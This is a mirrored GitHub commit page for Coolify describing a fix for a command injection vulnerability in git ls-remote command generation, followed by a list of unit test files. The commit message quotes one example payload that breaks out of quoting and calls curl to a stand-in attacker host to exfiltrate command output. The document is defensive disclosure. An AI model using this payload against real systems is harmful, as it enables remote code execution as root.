mirror of
https://github.com/coollabsio/coolify.git
synced 2026-03-11 08:55:47 +00:00
**Security Fix: Command Injection Vulnerability**
This commit addresses a critical command injection vulnerability in the
`generateGitLsRemoteCommands` method that could allow low-privileged users
(team members) to execute arbitrary commands as root on the Coolify instance.
**Vulnerability Details:**
- Affected deployment types: `deploy_key` and `source` (GithubApp)
- Attack vector: Malicious git repository URLs containing shell metacharacters
- Impact: Remote code execution as root
- Example payload: `repo.git';curl attacker.com/$(whoami)`
**Changes Made:**
1. **deploy_key deployment type** (Application.php:1111-1112):
- Added proper escaping for `$customRepository` in git ls-remote commands
- Uses `str_replace("'", "'\\''", ...)` to escape single quotes for bash -c context
- Wraps repository URL in single quotes to prevent interpretation of shell metacharacters
2. **source deployment type with GithubApp** (Application.php:1067-1086):
- Added `escapeshellarg()` for all repository URL variations
- Covers both public and private repositories
- Handles both Docker and non-Docker execution contexts
3. **Added comprehensive unit tests** (tests/Unit/ApplicationGitSecurityTest.php):
- Tests for deploy_key type command injection prevention
- Tests for source type with public repos
- Tests for other type (already fixed in previous commit)
- Validates that malicious payloads are properly escaped
**Note:** The `other` deployment type was already fixed in commit
|
||
|---|---|---|
| .. | ||
| Rules | ||
| ApplicationGitSecurityTest.php | ||
| ApplicationWatchPathsTest.php | ||
| CloudInitScriptValidationTest.php | ||
| DatalistComponentTest.php | ||
| DockerImageAutoParseTest.php | ||
| DockerImageParserTest.php | ||
| GitLsRemoteParsingTest.php | ||
| GlobalSearchNewImageQuickActionTest.php | ||
| HetznerDeletionFailedNotificationTest.php | ||
| HetznerSshKeysTest.php | ||
| ParseDockerVolumeStringTest.php | ||
| PrivateKeyStorageTest.php | ||
| ProxyCustomCommandsTest.php | ||
| ServiceConfigurationRefreshTest.php | ||
| ServiceParserImageUpdateTest.php | ||
| SshRetryMechanismTest.php | ||
| ValidGitRepositoryUrlTest.php | ||
| ValidHostnameTest.php | ||